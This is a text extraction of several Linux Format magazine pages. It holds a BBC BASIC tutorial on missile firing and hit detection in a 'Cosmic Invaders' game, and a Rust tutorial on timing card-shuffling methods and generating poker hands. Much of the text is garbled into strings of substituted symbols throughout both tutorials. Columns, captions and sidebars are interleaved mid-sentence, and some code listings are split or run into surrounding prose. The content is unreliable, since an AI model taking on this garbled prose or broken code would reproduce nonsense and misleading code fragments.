1550 ENDPROC
As you’ll see, in the interest of efficiency, the game’s
,!"/n/(n%020"!1%" ,),+ƒ:„1,$/,2-*2)1&-)"
,**+!0,+)&+"9=<8o
Firstly, this plays a sound effect to indicate that the
player missile is to be fired. If you examine the main
game code, you’ll also see that the variable Missile%
%0)/"!6""+!"#&+"!&+)&+"::>8,# PROC_Setup_
game. This value is set to false – that is, invisible – by
!"#2)121)&+"9=<8,#PROC_Fire sets this to true.
The COSMIC9.bas sample script crashes when a missile collides with an You’ll also note that the line sets two more variables:
alien because PROC_Hit hasn’t yet been defined. MISSILEX% and MISSILEY%. As you have probably

90 LXF326 April 2025 www.linuxformat.com

 Space Invaders CODING ACADEMY

DRAWING BOUNDARIES
If you have already run the sample script COSMIC10.bas, you’ll have
noticed that it has three procedures related to defining boundaries.
%" ,!"#,/1%"0" +"#,2+!,+)&+"09A>8v:9<8,#1%"
original code. You can examine these if you wish, but the best way to
understand how they work is to play the game or sample script.
If you do this, focus on destroying just one column of invaders
,+1%""51/"*")"#1v%+!0&!",#1%")&"+$/&!o #6,2!,1%&0n6,2}))
notice that the next column of invaders now moves to the edge of
the screen, instead of being locked in a rigid grid. The same holds
1/2"&#6,2!"01/,61%",11,*v*,01/,4,#&+3!"/0x1%",1%"/0
continue moving downwards.
The missile keeps moving up the screen at fixed intervals. The player The master procedure governing this is PROC_Boundary_Update.
can only fire one at a time. %&0&+&1&))601,/"01%"3)2",#1%")"#1v*,01,2+!/6&+1%")&"+
formation ƒO%„&+1%"3/&)"S%. The procedure then calls upon
guessed, these determine the horizontal and vertical PROC_X_Boundary_Update and PROC_Y_Boundary_Update to
starting positions of the missile respectively. adjust the horizontal and vertical positions of the grid respectively.
In the case of MissileX%, this is determined by the In the case of PROC_X_Boundary_Update, the procedure just
variable B%, which represents the current position of %" (0&#1%")"#1v*,01 ,)2*+ƒSpace%(O%,5)„&0"*-16o #0,n&1
the player’s ship. Because this is calculated from the &+ /"*"+102+1&)&1#&+!0 ,)2*+1%1!,"0 ,+1&+)&"+0o 1
)"#1v*,010&!",#1%"0%&-n:&0!!"!1,MissileX% to )0,!,"01%"0*"4&1%1%"/&$%1v%+!,2+!/6ƒP%„o
make the missile fire directly from the centre. PROC_Y_Boundary Update works in a similar way, in that it
The value for MissileY% determines that its firing !'20101%"1,-+!,11,*,2+!/&"0ƒQ% and R%„&#"*-16/,40
position always starts from a specific height just above are found, until it finds one containing aliens.
the ship. If the procedure ended here, the missile
would simply appear in this position directly above the
ship and remain static.
The boundaries
This is why PROC_Fire next invokes the procedure procedures
PROC_Move_Missile(L%). ensure that
%&0-/, "!2/"&0!"#&+"!,+)&+"09=>8v9>=8&+1%" the alien grid
original game code: makes use of
the available
1560 DEF PROC_Move_Missile(L%) space on screen
1570 LOCAL I%,K% after invaders
1580 PRINTTAB(MissileX%,MissileY%); are destroyed.
1590 IF FN_Find_Char <> 32 THEN PROC_Hit : GOTO
1650
1600 PRINTTAB(MissileX%,MissileY%+1);
1610 IF MissileY%+1 <> 23 THEN PRINT” “
1620 PRINTTAB(MissileX%,MissileY%);
1630 IF MissileY%<>1 THEN PRINT”^”
1640 IF MissileY%>1 THEN MissileY%=MissileY%-1
ELSE Missile%=FALSE &+"09>88v9><8$,3"/+1%" 12)*,3"*"+1
1650 ENDPROC ,#1%"*&00&)"6!!&+$91,MissileY% to move it
The overall purpose of this procedure is to manage progressively upwards. This section also checks if the
the movement and display of the missile after it has *&00&)"}0 ,,/!&+1"0/"*,/",/)"001%+:;n1%"
been fired. bottom limit from which a missile can emanate. If so,
+)&(",1%"/-/, "!2/"04"}3"4/&11"+0,#/n1%&0 &1-/&+100- "1&10 2//"+1-,0&1&,+1,"+02/"&1 As you fire the
one contains the parameter (L%). This is used for remains visible. missile, note
collision detection, which we’re going to cover later &+"9><80&*-)6011"01%1&#1%"*&00&)"/" %"0 that it changes
,+&+1%&0121,/&)o -,0&1&,+9ƒ1%"2--"/)&*&1,#1%"0 /""+„n1%"+&1}0 colour as it
The LOCAL variables of I% and K% are also rendered invisible. enters the same
predefined
something we’re encountering for the first time in You can download a sample copy of the Cosmic
bands as the
1%&0$*"o01%"+*"02$$"010n1%&0'201*"+0 Invaders script with PROC_Fire, PROC_Move_
invaders. The
1%1I% and K% are local to this particular procedure Missile(L%) and FN_Find_Char from https://bit.ly/ higher up the
PROC_Move_Missile. This is usually done to store lxfcosmic9. screen the
temporary values. alien is when
&+"9=@80&*-)6!/401%"*&00&)"1&10 2//"+1 Taking a hit it’s hit, the
position. This has already been defined by PROC_Fire, If you run the COSMIC9.bas sample script, you’ll notice greater number
so it should appear directly above the centre of the 1%14%"+6,2-20%1%"%&#1("6n*&00&)"ƒ//,4 of points you
player ship. 06*,)„+,4*,3"02-4/!0#/,*1%"-)6"/}00%&-o score. This is
The following line deals with collision detection and +#,/12+1")6n&#&1 ,))&!"04&1%+61%&+$6,2}))0"" determined by
PROC_Invader_
invokes a procedure if a missile finds its target, which another ‘NO SUCH FN/PROC’ error. This is because
Hit(L%).
we’ll explore in more depth later in the tutorial. PROC_Hit is currently undefined. You can find this in

www.techradar.com/pro/linux April 2025 LXF326 91

CODING ACADEMY Space Invaders

)&+"09>>8v9?<8,#1%",/&$&+)
game code:
Acorn and BBC 1660 DEF PROC_Hit
enthusiast 1670 SOUND &0010,-15,6,5 : IF
Colin Hoad MissileY% < 22 THEN PRINTTAB(M
who originally issileX%,MissileY%+1);” “
uploaded the 1680
Cosmic Invaders
PRINTTAB(MissileX%,MissileY%); :
script to GitHub
C%=FN_Find_Char
has reached
out to Nate on 1690 IF
Bluesky to say (MissileY%+1<=Y%+(R%+1)*3) AND
he’s an avid (MissileX%>=X%) AND
Linux Format (MissileX%<X%+(P%-O%+1)*4)
reader and THEN PROC_Invader_Hit(L%) :
is delighted GOTO 1720
with this 1700 IF MissileY%=1 THEN PROC_
series. Follow Mystery_Hit : GOTO 1740
Colin’s other
1710 PROC_Base_Hit
BBC-related
1720 I%=7
activities at
https://bsky. 1730 IF NOT FN_Is_Line THEN The latest sample script (COSMIC10.bas) supports shooting missiles
app/profile/ finish=TRUE that can obliterate aliens as well as the player’s shields.
colinhoad. 1740 ENDPROC
bsky.social. + "$&+n/(%0*!" invaders, as originally defined in PROC_Invader_Setup.
effective use of the colon to group multiple commands The variable R% determines the boundary for the
into lines for the sake of efficiency. invaders’ height so that they record as being hit no
,4"3"/n1%&0!,"0*(")&+"9>?8)&11)"!&##& 2)1 matter what part of the missile touches them.
1,!"1+$)"o%"SOUND command simply plays to The next part of the line simply determines that
indicate the missile has hit something. The line then 1%"*&00&)"}0%,/&7,+1)-,0&1&,+ƒ0!"1"/*&+"!6
checks that the missile’s Y coordinate is below 22, MissileX%„%0&+1"/0" 1"!4&1%1%1,#1%"&+3!"/0
+!&#0,"/0"0&16/"-) &+$&14&1%0- "o%&0 0!"#&+"!6X%. The variables P% and O% check
represents the fact that in the original Space Invaders, 1%"&+3!"/4&!1%n0,,+ "$&+1%"*&00&)" +01/&("
each missile is destroyed when it comes into contact anywhere on their bodies.
with something. The specific procedure of what to do if an invader is
&+"9>@8-) "01%" 2/0,/11%"*&00&)"}0 2//"+1 %&1&01%"+&+3,("!ƒPROC_Invader_Hit(L%)„+!1%"
position. This allows the game to interact with screen line then skips to the end of the procedure.
content here, like the invaders. This exact content is Assuming that the missile hasn’t collided with an
determined by the variable C%, which records the &+3!"/n1%"-/, "!2/"&+01"!*,3"0,+1,)&+"9?88o
current character in this position. This checks whether the missile’s Y coordinate is
&+"9>A8$,3"/+0 ,))&0&,+!"1" 1&,+1,!"1"/*&+" 9x1%"1,-,#1%"0 /""+o #0,n1%&0&+3,("0PROC_
if the missile has hit an invader. While this is a little Mystery_Hit, which governs what to do when the
involved, it’s enough to know that our old friend mystery ship is hit.
MissileY% determines the Y coordinates of the missile If the missile has hit neither a regular invader nor
and that the variable Y% determines the same for the the mystery ship, then PROC_Base_Hit is invoked.
+,1%"/4,/!0n1%"*&00&)"'201%&10,+",#1%"
defensive shields.
&+"9?;8!,2)"v %" (04%"1%"/+6&+3!"/0/"
left on screen. If there are none, the value finish is set
to TRUE, indicating the level is over.

Hitting out
If you worked your way through PROC_Hit, you’ll have
noticed that it can invoke three separate procedures.
The first of these is PROC_Invader_Hit(L%), which is a
little like PROC_Move_Missile(L%).
%&0&0*+$"!6)&+"09@>8v9A=8&+1%",/&$&+)
game code:
1860 DEF PROC_Invader_Hit(L%)
1870 LOCAL I%,K%
1880 IF Left% THEN G%=-1 ELSE G%=1
1890 IF MissileX% > X%+(L%-O%+1)*4 THEN
I%=(MissileX%-X%+(O%*4)+G%)DIV4 ELSE
I%=(MissileX%-X%+O%*4)DIV4
1900 K%=(MissileY%-Y%) DIV 3 :
If a missile hits an alien, this invokes PROC_Invader_Hit, causing both to Space%(I%,K%)=FALSE : J%=(I%-O%)*4 : PROC_
disappear. Scoring will be covered in next month’s tutorial. Blank(J%)

92 LXF326 April 2025 www.linuxformat.com

 Space Invaders CODING ACADEMY

1910 IF NOT FN_Is_Line THEN Space%(I%,5)=FALSE :

PROC_Boundary_Update MANAGING MYSTERIES
1920 K%=(MissileY%-Y%) DIV 3
1930 IF NOT FN_Is_Row THEN Space%(7,K%)=FALSE : In the previous tutorial, we examined the code for the mystery ship,
PROC_Boundary_Update as listed in PROC_Display_Invaders. If the player succeeds in hitting
1940 Missile%=FALSE : Score%=Score%+((3- the mystery ship, the game invokes PROC_Mystery_Hit. You can
((MissileY%-Y%)DIV3)DIV2)*20) : PROC_Info_line #&+!1%&0,+)&+"09?=8v9?A8,#1%"$*" ,!"o
1950 ENDPROC As you’ll see, the score awarded for hitting a mystery ship is
20104&1%PROC_Move_Missile(L%), this !"1"/*&+"!6/+!,*+2*"/,21,#;8n*2)1&-)&"!698o +,1%"/
procedure has a defined parameter. It also makes use 4,/!0n1%"/"4/! +"+61%&+$"14""+98+!;88-,&+10o
of the LOCAL variables I% and K%. These are also The original Space Invaders ,+1&+"!-/"!"1"/*&+"!)&01,#9>
used to determine the relative positions of the missiles 0 ,/"06,2 ,2)!,1&+#,/0%,,1&+$1%" š*601"/60%&-o%&040
and invaders. determined by a pointer that increments every time the player shot
&+"9@@8&020"!1,!"1"/*&+"1%"!&/" 1&,+&+ &1n2+1&)),,-&+$ (1,7"/,"3"/69>1%0%,1o%"%&$%"010 ,/"
which the invaders are moving to determine the value -)6"/ ,2)!,1&+&+1%&04640;88n1%"+&+1%3)2",+1%")&01o
of G%. This is crucial for determining the invader (&))"!-)6"/04%,4+1"!1,*5&*&0"1%"&/0 ,/"0)"/+"!1,%&1
-,0&1&,+n4%& %&0 ) 2)1"!&+)&+"9@A8o+)"006,2 1%"#&/01*601"/60%&-,+1%":;/!0%,1o #1%"61%"+20"!"3"/69=1%
are particularly mathematically gifted, there is no 0%,11%"/"#1"/1,0%,,11%" n1%"6}!$"1;88-,&+10"3"/61&*"o
+""!1,!")3"&+1,1%&0&+1,,*2 %!"1&)o2##& "&11, If you want to change the game code to reflect the original scoring
say that the line computes the position of the invader 0601"*n1%""0146&01,20" 011"*"+11,0 ,/"1%")&01,#
1%140%&10"!,+1%"*&00&)"}0 ,,/!&+1"o%" ))-,00&)"*601"/60%&-0 ,/"0&++//6o%"-/, "!2/" +1%"+
variable I% represents the column index of the invader cycle through these when determining the player score each time
in the grid. the ship is hit.
You’ll notice that in this line the code uses the DIV You can find a code sample for this alternative PROC_Mystery-Hit
command. This gives us the number of times a divisor at https://tinyurl.com/lxfcosmicmysteryhit.
goes into a dividend and forgets the remainder. To see
an example of this, type the following into your BBC
Basic emulator:
PRINT 20 DIV 7 In this version of
The answer you’ll see here is 2 ƒ?$,"0&+1,:814, Cosmic Invaders,
1&*"0n4&1%1%"/"*&+!"/,#>"&+$&$+,/"!„o +,2/ players score a
random number
,!"nDIV is being used to convert the coordinates in of 10-300 points
question to grid indices to correctly identify which for shooting the
&+3!"/%0""+%&1o%"0*"&01/2"#,/)&+"9@A8n mystery ship.
which also computes the index of an invader that’s
been hit relative to a missile’s X coordinate.
&+"9A880"101%"LOCAL variable K% to the row
index of the invader based on its vertical position
ƒMissileY%„o 11%"+*/(01%1/"&+1%"Space%
array as FALSE. In other words, it makes the specific
invader disappear once it’s destroyed.
&+"09A98v9A;820"1%"#2+ 1&,+0FN_Is_Line and
FN_Is_Row to check if line or row boundary conditions boundary update procedures from http://bit.ly/
are met. It can then add spaces to the array used to lxfcosmic10.
store the invaders grid to mark that it’s empty. PROC_ The player’s
Boundary_Update is then invoked to update the Death from above shields are a
overall movement of the invader grid. If you run the current sample script COSMIC10.bas, special object as
&+))6n)&+"9A<8!" 1&31"01%"*&00&)"60"11&+$ you’ll notice that the player can now fire missiles at the they’re affected
the relevant variable to FALSE. It then updates the aliens. When a missile makes contact with an alien’s by everything
player’s score. Note that the further up the screen an position, it disappears from the grid. You’ll also notice else. The
invader is when hit, the more points are awarded to that if you choose to fire at your own shields, this blows player can fire
missiles at them
1%"-)6"/o a chunk out of them. Keep firing to break through and
from below to
In order for this procedure to work correctly, you’ll let the missile continue up the screen.
damage them.
)0,+""!1,!"#&+"1%",3"v*"+1&,+"!PROC_ # ,2/0"n+,+",#1%&04&))01,-1%"/"*&+&+$)&"+0 They can also
Boundary_Updateo%&0&0!"#&+"!&+)&+"09A>8v9A@8 from moving down, which can still cause the game to be eroded by
,#1%",/&$&+)$*" ,!"o ,4"3"/n1%"-/, "!2/" crash. The latest sample script also deliberately omits enemy bombs.
&10")# ))0,+14,,1%"/-/, "!2/"0ƒPROC_X_ calling PROC_Info_Line, because we’ll cover updating Any section of
Boundary_Update and PROC_Y_Boundary_Update„ the score and high scores in the final part of this series. a shield that
1,4,/( ,//" 1)6o""1%"Drawing Boundaries boxout In the next tutorial, we’ll also cover creating alien comes into
(page 91) for more help with this. bombs that drop down, as well as the collision contact with
You can download a sample script that includes detection procedures when they hit the player’s ship an alien is also
destroyed.
PROC_Hit, PROC_Invader_Hit(L%) and the necessary ,/,+",#1%"0%&")!0o

LET US INVADE YOUR LETTER BOX Subscribe now at http://bit.ly/LinuxFormat

www.techradar.com/pro/linux April 2025 LXF326 93

CODING ACADEMY Rust

Part Two!

RUST
Don’t miss
+"51&002"n
020 /&",+
-$"9>j

How fast can

your Rust code run?
David Bolton demonstrates running two Rust programs used to time
card shuffling and generate a file full of poker cards.

n this article, we’re writing and running two struct Card {

I -/,$/*0o+"n ))"!CardShuffle, does the

timing of three slightly different ways of
rank: Rank,
suit: Suit,
shuffling a deck of 52 cards to see which is fastest. }
%"0" ,+!-/,$/*nPokerGenn,21-2101"51#&)",# struct Deck {
OUR 9n888)&+"0,#0"3"+ /!0-"/)&+"o,2 +!,4+),! cards: Vec<Card>,

EXPERT  #&)" ,+1&+&+$1%"2010,2/ "0+!-/,'" 1#&)"0

from GitHub at %11-0pšš&1o)6š)5#;:> ,!"o+7&-+!
}
If you look at the source file, you’ll also see lines
David Bolton 1%"+,-"+VSC&+"&1%"/-/,'" 1#,)!"/o )&(" #[derive(Debug, Clone, PartialEq)] , which are
gets even rustier ++"51*,+1%}0&+01)*"+1n1%&/!-/,$/* declared above each enum and struct. These are
with two poker (PokerHand) will read this file line by line and determine ))"!1/&10+!0-" &#60& &*-)"*"+11&,+021
programs for the best five-card hand from the seven cards for each 6,2 +-/,3&!"6,2/,4+04"))o%"0"/"1%"
shuffling a pack 0"10.2& ()60-,00&)"o standard traits available:
of cards and 0202)n1%"-/,'" 1#&)"04"/" /"1"!4&1%1%" • ,*-/&0,+1/&10pEqnPartialEqnOrdnPartialOrd.
outputting a cargo new ,**+!o ,/!"1&)0,+&+01))&+$201n • Clonen1, /"1"T#/,*&T3& ,-6o
ʋơˉʋࢳljǫȍơȶljࠀ࡬߿߿߿
sets of seven
,!"+!1%"14,"51"+0&,+0+""!"!n-)"0"0""
the article in LXF325. Let’s look at CardShuffle first.
• Copyn1,$&3"16-" ,-60"*+1& 0&+01"!,#
move semantics.
poker cards. • Hashn1, ,*-21"%0%#/,*&T.
CardShuffle • Defaultn1, /"1"+"*-16&+01+ ",#!116-"o
This generates a deck of cards in the " (pp+"4ƒ„
*"1%,!o"*"*"/1%"pp+"4 method is like a
• Debug, to format a value using the‡plˆformatter.
Unlike, say, C# or Java, the object-oriented
constructor in other languages but is not called -/,$/**&+$&+201&0!&##"/"+1o%"/"}0+,0216-&+$
1%1o" ( is a struct with a /!0 field, which is a ,/&+%"/&1+ "+!6,2 +*("*"1%,!0-/&31"
" •/!–, and a Card is a struct with two enums ƒ"+ -02)1&,+„o,2 +!"#&+"*"1%,!0,+01/2 10n
#,/+( and Suit. These are: "+2*0+!12-)"0n+! ,+1/,)1%"/")1&,+0%&-0

There are
similarities and
differences
between C# and
Rust. If you are
a C# developer
starting to
use Rust, you
may find this
multipage
Microsoft
resource for
C# developers
learning Rust
useful: https://
bit.ly/lxf326MS
Running a ‘rustup update’ command in a terminal.

94 LXF326 April 2025 www.linuxformat.com

 Rust CODING ACADEMY

It’s worth
running rustup
update once
a week or so
as updates do
happen. Make
sure you’re not
compiling or
anything when
you do it.

Using ‘cargo run’ to first build then run a release version.

"14""+16-"01%/,2$%1/&10o%&0&0,+",#1%"1%&+$0 for suit : &Suit in [Suit::Hearts, Suit::Diamonds,

1%1*("0201!&##"/"+1#/,*,1%"/-/,$/**&+$ Suit::Clubs, Suit::Spades].iter() {
)+$2$"0o ,/+,4n "-11%11/&10!"#&+" If you are using VSC+!1%"201+)67"/
collection of methods; it’s a bit like interfaces in other "51"+0&,+n6,2}))0""&1,#1"+!!01%"16-"#1"/1%"
-/,$/**&+$)+$2$"0o 3/&)"o"16-"!&+1%&0p
" &0!6+*& //616-"o 1}0)), 1"!ƒ&+ for suit in [ If you’re new
CardShuffle) like this: And it converted it to: to Rust and
let mut cards = Vec::with_capacity(52); For suit: &Suit in [ want a starter
Vecs can grow in size but it’s more efficient to 1 +"&1,##v-211&+$1#&/01216,2$"120"! guide try here:
0-" &#61%"&+&1&) - &16+!1%1}04%1 vec::with_ 1,&1+!(+,4&+$1%11%"16-"&0/"#"/"+ "&020"#2)o https://github.
com/kyclark/
capacity(52) does. It allocates enough room for 52 The for rank : &Rank in [ ),,-4,/(0&+1%"0*"46o
command-line-
cards. However, it doesn’t add any cards – the cards ,2*&$%14,+!"/&#&1}0-,00&)"1,0&*-)&#61%"0" rust
still need to be created. #,/v&+060&*-)6&1"/1&+$1%/,2$%))*"*"/0,#+
Std::fmt::Display
In C#, there’s a method ,1/&+$ƒ„that you can
,3"//&!"20"!1,,21-21&+#,/*1&,+#/,* )00&+ A BIT ABOUT POKER HANDS
1"51#,/*1o +201n1%"3"/6/,2$%".2&3)"+1&01/&1
called #*1pp&0-)6o6&*-)"*"+1&+$#,/01/2 1,/ %"3"/0&,+,#-,("/1%&0--)&"01,&0"50%,)!}"*o"}/"+,1
enum (in this case Card01/2 1„n4" +1%"+)1"/ )) 4,//&"!,21"11&+$,/,1%"/-)6"/0n2111%""+!,##,2//,2+!0
-/&+1)+j on a card, as is done in the *&+ƒ„ function. This ,#"11&+$n1%"/"/"#&3" /!0,+1%"1)"ƒ ))"! ,**2+&16 /!0„
1/&120"01%"*1 %ƒ-11"/+*1 %&+$)&("&+04&1 % and two in your hand. From these seven cards, a best hand of five is
011"*"+1„1, ,+3"/11%"/+(+!02&1&+1,1"51o -& ("!o"),4&01%")&01,#4&++&+$%+!0/2++&+$#/,*1%""011,
The 4/&1" line uses ‡ˆ1,,21-21-)&+&!"+1&#&"/0o ),4"01o2&10/" nn,/n/"-/"0"+1&+$%"/10n )20n!&*,+!0,/
,2})),#1"+0""*+6"5*-)"0)&("1%&0p 0-!"0o+(0/":;<=>?@A 4%"/"’98n ’' (n’.2""+n
write!( “{} {}”,variable1,variable2); ’(&+$+!’ "o,1"p " +"),4,/%&$%o
,4"3"/n6,2 +)0,-211%,0"3/&)"0&+0&!" 1. Straight flush: Five contiguous cards all of the same suit, such as
1%"/ "0n*2 %)&("01/&+$&+1"/-,)1&,+&+,1%"/ : v; v< v= v> o01/&$%1#)20%/2++&+$981, "&0)0, ))"!
)+$2$"0o 1&0+}1&+1"/-,)1&,+n1%,2$%n+! +}1!, a royal flush.
"5-/"00&,+0n,+)63/&)"0o 2. Four of a kind: Four cards all of the same rank, such as
write!( “{variable1} {variable2}”);  vvvv; o
So, !" (o/"*&+&+$ƒ„can’t be inside the braces: 3. Full House:%/"" /!0,#1%"0*"/+(-)2014,,#1%"0*"
println!(“\nRemaining cards: {}”, deck.remaining()); /+(n02 %0@ v@v@v?v?
Note: you can do the same as #+1pp&0-)6 for 4. Straight: &3" ,+1&$2,20 /!0,#+602&1n)&("? v@vAvv o
-/,$/**"/v#/&"+!)6,21-216&*-)"*"+1&+$ 5. Three of a kind: ,/"5*-)"n vvv< v?o
#*1pp"2$. 6. Two pairs: ,/"5*-)"n= v=vAv vo
7. One pair: ,/"5*-)"n< v<o
What does [ ] do? 8. High card: ,/"5*-)"n v@v:v= v>o
In the " (pp+"4 method, this line declares a growable 11%"0%,4!,4+n-)6"/0 ,*-/"1%"&/"01%+!01,0""4%,
array holding the four Suit enum values. The o&1"/ƒ„ 4,+q&#1%"6/"1%"0*"n1%"60-)&11%"-,1o
iterates through the array elements by reference:

www.techradar.com/pro/linux April 2025 LXF326 95

CODING ACADEMY Rust

"+2*4&1%,210-" &#6&+$1%"*o 1 +"!,+"&#6,2 %2##)&+$•– method. The•– notation means that

add in a crate strum. We’ll use that in future code. &14,/(04&1%+616-"T. We could have used Card
This code determined that the fastest method was instead of T. As you’ll see, we converted Shuffling to a
shuffle11+3"/$",#:@@+0o,n&1 +0%2##)"'201 " (*"1%,!+!")&*&+1"!1%"$"+"/& 0-" 1,#&1o
2+!"/;n=88!" (0-"/0" ,+!4%& %&0/"0,+)"o
Methods and functions
What is RandomState? CardShuffle has only one standalone function – /+!ƒ„.
112/+0,211%"/"}0-/"116$,,!/+!,*+2*"/ The " ( functions are all methods. A method is a
generator in the hash module. It’s called in the #2+ 1&,+1%1&0&*-)"*"+1"!,+01/2 1n"+2*,/12-)"
and has &self01%"#&/01-/*"1"/o%1Self gives it
access to the fields. All three Shuffle methods actually
RANDOM NUMBERS AND SHUFFLING have &mut self which is the same thing but means that
they can modify the struct fields. The /"*&+&+$ƒ©0")#„
Although there is a rand crate, if you want to do something as method has immutable access to 0")#o /!0.
*2+!+"00%2##)&+$ /!0&+201n1%"/"/"#"4,1%"/4601,!, ,2 +)0,%3"00, &1"!#2+ 1&,+0&+2011%1
&1o21,#&+1"/"01n4"1%,2$%14"}!1&*"1%"*1,0""4%& %&0#01"01o /")&("011& #2+ 1&,+0&+,/¨o%"6-/,3&!"
When you’re trying to write fast code, you need to time it. We’ll !!&1&,+)#2+ 1&,+)&1621,+)61,1%"16-"n+,11,
time the!" (o0%2##)"ƒ„q/,21&+"+! ,*-/"1%"1&*"1("+1, &+01+ "0,#1%"16-"o+"5*-)",#1%&0&01%11%"
0%2##)"!" (,# /!0o &/01n4"!!1%&0)&+"11%"1,-1,20"1%" original %2##)&+$ƒ„function was written as a generic
time module: associated function and looked like this:
use std::time::Instant; fn shuffling<T>(vec: &mut [T]) {
Then we add the following line before the code to time: let n: usize = vec.len();
let start = Instant::now(); for i in 0..(n - 1) {
After that we add: let j = (rand() as usize) % (n - i) + i;
let duration = start.elapsed(); vec.swap(i, j);
println!(“Time elapsed in shuffling is: {:?}”, duration); }
Debug runs are slower, so it’s always best to time release runs. Do }
a release build, then run as release. Just add --release on the cargo And was called by this line in shuffle1:
build and run commands. Conveniently, cargo run does the build and Deck::shuffling(vec: &mut self.cards);
runs it for you, so you don’t have to do cargo build each time. But if (&+$&1*"1%,!0&*-)&#&"!&11,1%&0p
you just want to build, feel free to use it. fn shuffling(&mut self) {
$ cargo build –-release let n: usize = self.cards.len();
$ cargo run –-release for i in 0..(n - 1) {
There are three ways to shuffle the deck, named shuffle1, : and ;. let j = (rand() as usize) % (n - i) + i;
Here are listings of 0%2##)": and 0%2##)";. They are similar but ; self.cards.swap(i, j);
uses a local variable rng, while 0%2##)":20"01"*-,//6,+"o }
fn shuffle2(&mut self) { }
self.cards.shuffle(&mut thread_rng()); And it is now called by this:
} self.shuffling();
fn shuffle3(&mut self) { 1!&!+}1##" 11%"-"/#,/*+ "o
let mut rng = thread_rng();
self.cards.shuffle(&mut rng); PokerGen
} PokerGen$"+"/1"01"51#&)",#9n888)&+"0,#0"3"+
The only accurate way is to call these a thousand times or more cards. It uses the shuffle1 method from CardShuffle.
and get an average. This eliminates random effects of background %"-/,$/*$"+"/1"0 /!!" (n1%"+&+for),,-
-/, "00"0!2/&+$1%"1&*&+$o,n0%2##)": now looks like this: it shuffles the deck and gets the first seven cards,
fn shuffle2(&mut self) { 4%& %/"4/&11"+&+,+")&+"1,1%"1"51#&)"o%&0
for _i in 1..1000 { method first_seven returns a slice of seven cards.
self.cards.shuffle(&mut thread_rng()); fn first_seven(&self) ->&[Card] {
} &self.cards[..7]
} The oo?†builds a slice from the first seven cards.
%"3"/$"1&*"0/"-/"116 ,+0&01"+1o + 0"6,24"/"4,+!"/&+$noo? is 8; in a slice these
numbers are indices and the second number is always
one more. A slice is a section of a collection, such as a
3" ,/+//6o #1%"#&/01&+!"5&+0)& "&00, you can
!/,-&1o,8oo? and .o? are identical.
#6,2}/" 2/&,20,211%"-)6&+$ /! %/ 1"/0n
1%"0"/"+& ,!" %/ 1"/0o,2 +0""1%"0"+!
an alternative set at 444o)1v ,!"0o+"1š02&1v /!0o
phpo #6,2-/"#"/1%"1/!&1&,+)%"/10n )20n0-!"0
and diamonds, just change the characters in suit_str.

For loops with _

Comparison by timing of three shuffle methods. In the main function, there is a for),,-1%1/2+0
thousand times, as follows:

96 LXF326 April 2025 www.linuxformat.com

 Rust CODING ACADEMY

You can declare

numeric
variables with a
type suffix, such
as 78i16 or 13u8.
If you don’t
specify it, the
type depends
on how it is
used. If there’s
no constraint,
ijéÐĆǏìĆijÐäÐĨĬǎ
default to i32
and f64 for
floating point.

Debugging PokerGen using ? commands in Debug Console to view cards.

for _ in 0..1000 { ,*-/"!1,01/2 10+!"+2*0n12-)"0/")"00"/v

The 8oo9888 is a range that starts at 0 and finishes used data structure. But like structs and enums, you
1AAAo8oo9888 is a range and the second number is +!!1/&10ƒ1%1&0n#2+ 1&,+0„o+)&("01/2 10+!
one more. "+2*0n6,2!,+}1+""!1,!" )/"12-)"q6,2 +'201
We’re not using the for variable value, so by using an create one like this:
underscore, we show that we don’t need that value. If let mixed_pair = (42, String::from(“Rust”)); // i32 and
we’d used a variable such as i but not used it, then the string
,*-&)"/4,2)!%3"&002"!4/+&+$p println!(“{} {}”,mixed_pair.0,mixed_pair.1);
Unused variable ‘i’ The o8no9&0%,46,2/"#"/1,1%"12-)"")"*"+10o Output text file
)1%,2$%4/+&+$0!,+}101,-02 "00#2) %" ,!""),40%,40*"1%,!0&*-)"*"+1"!#,/ from ‘pokergen
programview
,*-&)1&,+n&1&0)460$,,!&!"1,&+3"01&$1" 12-)"1%1*1 %"01%"-/"3&,20!"#&+&1&,+p
cards’.
them and get rid of them. However, if you have a lot of impl PairOperations for (i32, String) {
"//,/0n6,2*&$%14+11,1"*-,//&)6%&!"4/+&+$0n fn sum(&self) -> i32 {
and we do that through attributes. // Add number to string length
%"/"/"14,16-"0,#11/&21"0p,21"/+!&++"/o self.0 + self.1.len() as i32
++"/11/&21"0n4/&11"+4&1%+"5 )*1&,+ƒj„#1"/ }
the hash (#„n--)61,1%"&1"*1%11%"11/&21"&0 fn swap(&self) -> Self {
!" )/"!4&1%&+o21"/11/&21"0n4/&11"+4&1%,211%" (self.1.len() as i32, self.0.to_string())
"5 )*1&,+#1"/1%"%0%n--)61,1%"1%&+$1%1 }
follows the attribute. fn describe(&self) -> String {
,%&!"4/+&+$0n-211%&011%"1,-,#6,2/#&)" format!(“Mixed pair: number {} and string ‘{}’”,
before any use011"*"+10o 1}0&++"/" 20"&1--)&"0 self.0, self.1)
to the whole file: #![allow(warnings)] }
Another attribute used in CardShuffle is ¨ #$ƒ1"01„†, }
just before mod tests, and means it is conditionally "/"&0 ,+#20&+$12-)"1%1%014,")"*"+10p+
,*-&)"!o%"1"01 ,!"&0,+)6 ,*-&)"!+!/2+4%"+ //6,#1%/""&+10n+!12-)"1%1 ,+1&+001/&+$
you do cargo test, and it only runs those tests that are and an int:
If you want a
marked with ¨ 1"01†. Test and #$ are both outer let tuple1 = ([1, 2, 3], (String::from(“Alice”),30)); program to exit
attributes so there’s no jo%"0"--)61,1%"1%&+$0 println!(“First array element: {:?}”, tuple1.0[0]); early, you can
1%1#,)),41%"11/&21"o println!(“Person’s name: {} Age {}”, tuple1.1.0, do it by adding
tuple1.1.1); this line:
What is a tuple? Because CardShuffle&0,210-""!n4"!&!&+&1&))6 ::std::process::
)1%,2$%4"%3"+}120"!12-)"0&+"&1%"/,#1%"14, ,+0&!"/*,/"v)&("--/, %20&+$+&+1"$"/8v=9 exit(n) where
-/,$/*0&+1%&0121,/&)n&1}04,/1%(+,4&+$,21 1,/"-/"0"+1" % /!o&3&!"1%"3)2"69;1,$"1 n is 0 for OK,
1%"*o12-)"&00&*-)"01/2 12/"1%1 +%,)!2- 1%"02&1ƒ8v;„+!!&3&!"6<ƒ8v9:„1,$"11%"/+(o or 1 or higher
to indicate
1,9:!&##"/"+116-"0,#&1"*0o%"/" +"+6 +1%""+!n%,4"3"/n4"4"+1#,/1%""+2*0" 20"
­ǏĥĨČÅÿÐąƧǎ
